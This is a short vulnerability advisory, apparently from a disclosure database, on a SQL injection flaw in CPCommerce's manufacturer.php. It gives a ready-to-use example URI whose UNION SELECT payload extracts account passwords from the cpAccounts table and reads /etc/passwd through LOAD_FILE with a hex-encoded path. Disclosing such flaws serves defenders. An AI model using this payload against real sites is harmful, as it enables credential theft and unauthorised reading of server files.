CPCommerce Manufacturer.PHP SQL Injection Vulnerability

CPCommerce Manufacturer.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,LOAD_FILE(0x2F6574632F706173737764),0/**/from/**/cpAccounts/*